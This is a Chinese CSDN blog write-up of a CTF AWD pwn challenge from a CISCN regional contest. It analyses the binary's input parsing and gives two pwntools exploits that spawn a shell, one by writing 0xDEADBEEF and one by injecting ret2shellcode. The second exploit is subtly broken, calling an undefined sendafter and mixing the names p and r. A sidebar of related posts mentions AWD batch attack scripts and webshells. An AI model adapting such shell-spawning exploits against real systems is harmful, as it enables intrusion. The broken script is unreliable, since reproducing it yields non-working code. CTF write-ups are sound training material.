ciscn 华中赛区分区赛 awd pwn1

最新推荐文章于 2023-06-29 21:29:55 发布
最新推荐文章于 2023-06-29 21:29:55 发布
阅读量518 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/118437290
版权

缓冲区溢出 Shell RET2SHELLCODE exploit 字符串比较
关键词由CSDN通过智能技术生成

在这里插入图片描述
罕见的有保护没有都开。

在这里插入图片描述在这里插入图片描述输入是input
sb是第一个:
:后面的第一个事sc
sc后面第一个回车是sd
sd后面第一个又是input

E0存放着input
E8放着sc

所以其实也就是回车为分界,一组一个回车。
:又将每一组分开,分别存放在E0,E8。

有个strcasecmp函数

头文件:#include <string.h>
定义函数:int strcasecmp (const char *s1, const char *s2);
函数说明:strcasecmp()用来比较参数s1 和s2 字符串,比较时会自动忽略大小写的差异。
返回值:若参数s1 和s2 字符串相同则返回0。s1 长度大于s2 长度则返回大于0 的值,s1 长度若小于s2 长度则返回小于0 的值。

在这里插入图片描述
然后最多重复五轮,就出循环了。

在这里插入图片描述根据v7的不同的值进入不同的函数。

1
在这里插入图片描述假如6020d0的空间里面的字符串,就可以拿到shell。

在这里插入图片描述
咋申请不知道

2
在这里插入图片描述v9、v10控制在那个空间的哪里开始读,读多少。

3
在这里插入图片描述这个又是写。

在这里插入图片描述
当都不是的时候还有一个分支。
这直接会执行写在那个chunk的函数。

1、2、3就是申请,读写。

整体思路比较明确,就是通过上面的while循环控制参数,跳出循环可以两个回车,或者五个填满,我们直接两个回车就好。

所以两个思路,两份wp,在比赛的时候可以两个都打一下,可能别人只补了一个洞。

第一种
我们就只要控制它申请一块空间写入DEADBEAF,然后1就行。

exp

from pwn import *

context.log_level = 'debug'

r = process("./1")

r.sendafter('>', 'op:2\n+:0\nn:4\n\n')
r.sendafter('ready?', p32(0xDEADBEEF))
r.sendafter('>', 'op:1\n+:0\nn:4\n\n')

r.interactive()

第二种就是ret2shellcode了

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
context.os = "linux"

p = process("./1")
shellcode = asm(shellcraft.sh())

sendafter('>', 'op:2\n+:0\nn:'+str(len(shellcode))+'\n\n')
sendafter('ready?', shellcode)
sendafter('>', 'op:4\n+:0\nn:4\n\n')

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AWD----模式&准备&攻防&监控&批量
qi_SJQ_的博客
02-27 3588
1.前置知识: 1) 2)AWD 常见比赛规则说明: Attack With Defence:简而言之就是你既是一个 hacker,又是一个 manager。 比赛形式:一般就是一个 ssh 对应一个 web 服务,然后 flag 五分钟一轮,各队一般都有自己的初始分数,flag 被拿会被拿走 flag 的队伍均分,主办方会对每个队伍的服务进行 check,check 不过就扣分,扣除的分值由服务 check 正常的队伍均分。其中一半比赛以 WEB 居多,可能会涉及内网安全,当然还有pwn这些。 3)前.
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 415
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
ciscn 华中赛区分区赛 awd pwn2
yongbaoii的博客
07-15 472
libc 2.27 record 结构还是比较清晰的。 申请了一个大小为0x110的chunk。前0x10是mark,后0x100是msg。 在最后八个字节那里,维护了一个单链表。 scrape 也就是删除,但是在删除链表尾的时候有uaf。 browser 就是输出,上面花里胡哨的也没啥用,然后有个格式化字符串漏洞。 rewrite 可以重新写一下。 backdoor 也是在做一个输出。 漏洞有俩,一个格式化字符串,一个uaf。 uaf利用半天利用不出来,格式化字符串倒是简单。 exp from p.
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2439
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
CISCN国赛线下AWD总结与反思
qq_53755216的博客
06-28 861
整体总结 关于比赛 实战起来和练习还是有很大的不同 到了比赛一上来遇到了3台web 有点手忙脚乱的 比赛是两个cms + 一个game 由于没有经验 一时不知道从哪里入手或从哪里去打 导致对团队做出的贡献很小 有点遗憾 所以要好好练一练代码审计 并且提高一下运维的技术? 关于攻击和防御 我们发现机器很快被上了马 于是决定把机全部宕掉 我觉得上来备份完后可以手动宕机 然后慢慢修 这里有个小问题就是 数据库的备份问题 这次比赛没有很简单能够打数据库的洞 所以数据库没被打 并且我们第一天三个web一直宕机 导致没
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-8.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
第一届长城杯 第三赛区 半决赛 AWD 源码
最新发布
04-23
【标题】"第一届长城杯 第三赛区 半决赛 AWD 源码"指的是一个编程竞赛的源代码,很可能是参赛队伍在半决赛阶段使用的自动武器动态(AWD)系统的代码。这个标题揭示了这是一个与软件开发竞赛相关的内容,特别关注的是...
PwnWAF:用于AWD的pwn日志工具
05-16
用于AWD的pwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要记录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: ...
S2 AWD排位赛-11.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
awd的批量脚本 pwn_AWD攻防工具脚本汇总(一)
weixin_39527879的博客
12-20 731
#-*- coding:utf-8 -*-importparamikoimportthreadingimportqueueimporttime#反弹shell pythonq=queue.Queue()#lock = threading.Lock()#ssh 用户名 密码 登陆defssh_base_pwd(ip,port,username,passwd,cmd):port=int(port)ss...
wp篇 AWD某一赛题全流程复现【江西省高校网络安全技能大赛】
这周末在做梦的博客
11-06 5409
一,赛题概述 1概述 这道题目是PbootCMS V3.05,主页面如下。 2配置概述 采用tutum/lamp的镜像,Php 5.3+,其他扩展自行apt安装即可 3漏洞赛题 目前在dump下来的镜像中,发现存在且非CMS本身的官方预制漏洞有三,分别记录如下。 备注:在复现以下漏洞的时候,为了图一省事就赋予了所有文件777权限。 二,RCE 1赛题预制原理 (1)文件预制 .htaccess中 AddType application/x-httpd-php .sql php_value auto_ap
AWD-Test2
shinygod的博客
04-07 2887
00x1-eval后门 先用D盾扫一波 00x2-日志包含 原理: `log1.php``会把我们的请求以及其他的一些信息写进根目录下的log.php中。 然后我们进入log.php时,就会解析我们的shell了。 也就是有POST或者GET传参的地方,就能getshell 在任意位置添加一句话马,然后在/log.php,getshell 或者… 00x3-ping 在user.php中的ping,可以用管道来getflag 漏洞引发顺序: index.php中的$c值在function.p
2021 ciscn 华中赛区分区赛 pwn note
yongbaoii的博客
09-02 404
libc 2.31 保护是都拉上的。 刚开始有个花指令,通过一定的调整,再反汇编,就得到了正确的结果。 可以看到除了必要的初始化setbuf之外还将4050的地方清空了。 后面我们会看到4050就是存放地址的地方。 add 看一下content的输入 很明显的off by one。 整体结构还是比较清晰的,最多申请三个chunk。 free 清理的很干净。 show show也是正常泄露。 很明显的off by one,我们的常规思路也就是overlap或者unlink。 因为这里泄露不了基地址,所以我
buuctf-AWD-测试1
m0_62008601的博客
08-03 2377
thinkphp漏洞复现/ssh远程登录
ciscn 2022 华中赛区 misc
wha1e的博客
07-28 541
ciscn 2022 华中赛区 misc
2019CISCN华中赛区分区赛部分wp
一筐萝卜的博客
06-03 1427
pwn1 64位程序,只开启了NX(栈不可执行)保护,试着运行发现是一个菜单题,选项二、三没用 拖到IDA中查看,发现在encrypt选项中存在gets造成的栈溢出漏洞 不过输进去的字符串被分段异或了,我们可以先进性异或一下,然后在输入程序中,程序再异或一下就是我们想要的payload了 当时写脚本的时候发现流程劫持后,第二次发送payload的时候,payload没有被程序异或,直接打就可以...
AWDPwn 漏洞加固总结
蚁景网安学院
07-30 2442
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
ciscn_2019_s_1
doudoudedi
06-29 742
思路 通过off by null写key值然后unlink写bss段再次double free写free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1') p=remote('node3.buuoj.cn',26429) elf=ELF('./ciscn_s_1') libc=elf.libc def add(idx,size,data): p.sendlineafter('show','1') p.sendlineafte
bugku s1 awd排位赛-12
08-07
bugku s1 awd排位赛-12是Bugku安全平台上举办的一场AWD(Attack and Defense)排位赛的第12轮比赛。Bugku是一个致力于网络安全技术研究和交流的平台,这场比赛的目的是为了检验参赛者在攻击和防御方面的技术实力。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值